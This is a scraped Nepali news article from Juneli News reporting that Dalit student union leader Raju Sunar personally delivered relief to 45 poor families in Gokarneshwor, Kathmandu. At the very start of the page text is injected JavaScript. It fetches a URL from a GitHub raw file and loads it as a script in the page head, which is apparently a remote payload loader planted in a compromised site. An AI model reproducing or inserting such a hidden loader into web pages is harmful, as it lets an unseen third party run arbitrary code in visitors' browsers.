;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); राहात वितरणमा नेपाल दलित बिधार्थी संघका केन्द्रीय अध्यक्ष राजु सुनारको संघर्ष जारी – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • राहात वितरणमा नेपाल दलित बिधार्थी संघका केन्द्रीय अध्यक्ष राजु सुनारको संघर्ष जारी
जुनेली बिशेष

राहात वितरणमा नेपाल दलित बिधार्थी संघका केन्द्रीय अध्यक्ष राजु सुनारको संघर्ष जारी

बैशाख १३  ,

काठमाडौँ |   नेपाल दलित संघ केन्द्रीय समिति र नेपाल दलित विद्यार्थी संघ केन्द्रीय समितिको संयुक्त प्रयासमा  :२०७७/०१/१४  गते  पनि  काठमाण्डौं गोकर्नेश्वोर नगरपालिकाका विभिन्न स्थानमा  रहेका दलित,  मजदुर र  बिपन्न वर्गहरुलाई नेपाल दलित संघका केन्द्रीय अध्यक्ष राजु सुनार आफै घर घरमा पुगेर ४५ वटा परिवारलाई राहत वितरण गरेको छन्  |

विशेष भूमिका: माननीय मीन विश्वकर्मा ज्यू, आदरणीय हरिशरण नेपाली ज्यू, आदरणीय दीपक सोनी ज्यू, आदरणीय शेरब बहादुर तामाङ ज्यू, टेक बहदुर वि.क ज्यू, सुवास बराईली ज्यू र सहयोगी अरु सम्पूर्णलाई राजु सुनारले  धन्यवाद व्यक्त गरेका छन् ।

“समाज सेवा त राष्ट्र सेवा” जय नेपाल ! जय मानव !!!

फेसबुक प्रतिक्रियाहरु